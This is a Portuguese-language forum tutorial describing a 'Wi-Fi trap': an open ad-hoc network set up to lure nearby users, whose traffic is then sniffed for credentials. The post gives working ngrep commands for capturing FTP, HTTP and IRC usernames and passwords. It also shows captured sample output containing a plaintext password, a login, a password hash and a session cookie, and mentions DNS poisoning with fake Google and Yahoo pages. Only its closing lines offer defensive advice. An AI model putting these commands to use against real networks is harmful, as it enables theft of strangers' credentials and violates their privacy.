Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Wifi-TRAP e snifing

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial Wifi-TRAP e snifing

    Salve pessoal do BotecoUnix neste artigo vou mostrar uma técnica diferente de snifing ou seja farejar dados de um alvo,Bem a teoria desta técnica é bem simples imagine uma rede uma teia de aranha os insetos vão na teia por vontade enquanto a aranha faz o serviço dela… vou explicar

    vamos para o ambiente, digamos que o cracker tenha uma maquina com uma placa de rede ligada na internet e outra placa wireless com chipset atheros por exemplo em modo “Ad-Hoc” cujo o “essid” esteja com nome “livre rede livre”


    Desta forma todos que tiver no raio do sinal vão ficar lokos para entrar e ter internet gratis mas ai que entra o plano maléfico, limitamos o sinal dos clientes conectados e podemos fazer “N” coisas como “DNS poison” fazendo fakes do yahoo,google por exemplo ou podemos snifar e extrair dos packets o que nos intereça ou seja “Senhas” e dados do cliente para tal feito vamos usar o “NGREP” que nada mais é que um Snifer que podemos achar dados de acordo com uma determinada “Regex” exemplos
    capturar dados do serviço FTP

    Código:
    ;ngrep -wi -d any ‘user|pass’ port 21
    capturar senhas da porta 80
    ngrep -wi -d wlan0 'pass' port 80 -W
    suponhamos que você queira pegar senhas de IRC
        ngrep-1.45 # ./ngrep -wi -d wlan0 'user|pass' port 6667
        interface: wlan0 (192.168.1.0/255.255.255.0)
        filter: (ip) and ( port 6667 )
        match: ((^user|pass\W)|(\Wuser|pass$)|(\Wuser|pass\W))
        ########
        T 192.168.1.104:60420 -> 84.45.99.122:6667 [AP]
          PASS mypassword.
        ####
        T 192.168.1.104:60420 -> 84.45.99.122:6667 [AP]
          USER d3hydr8 8 * :d3hydr8.
     
        Ou senhas de http
        linuxbox:/home/d3hydr8/ngrep-1.45 # ./ngrep -q -d wlan0 -W byline port 80 -n 5
        interface: wlan0 (192.168.1.0/255.255.255.0)
        filter: (ip) and ( port 80 )
     
        T 192.168.1.104:42263 -> 205.158.62.76:80 [AP]
        GET
        /scripts/common/proxy.main?show_frame=Enter&action=login&domain=linuxmail.org&v=
        9e4b59553085147ce2d5e268d0a8419d05dc4cb5c0f49a1fbc09f367d6d29229&login=d3hydr8&
        password=34819d7beeabb9260a5c854bc85b3e44&hash=1&md5=1 HTTP/1.1.
        Host: www.linuxmail.org.
        User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20071015
        SUSE/2.0.0.10-0.1 Firefox/2.0.0.10.
        Accept:
        text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,
        image/png,*/*;q=0.5.
        Accept-Language: en-us,en;q=0.5.
        Accept-Encoding: gzip,deflate.
        Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7.
        Keep-Alive: 300.
        Connection: keep-alive.
        Referer: http://www.linuxmail.org/scripts/common/index.main?signin=1&lang=us.
        Cookie: loginName=d3hydr8.
    Bem fico por aqui pessoal espero que esta dica ajude o pessoal
    e usem uma criptografia boa antes de entrar em uma rede sem “WEP” ou “WPA”
    verifique se é um roteador,acess point se não pode ser é nenhum cara fazendo Wifi-Trap
    ~# Criado pela [IN]Segurança #~
X
Working...
X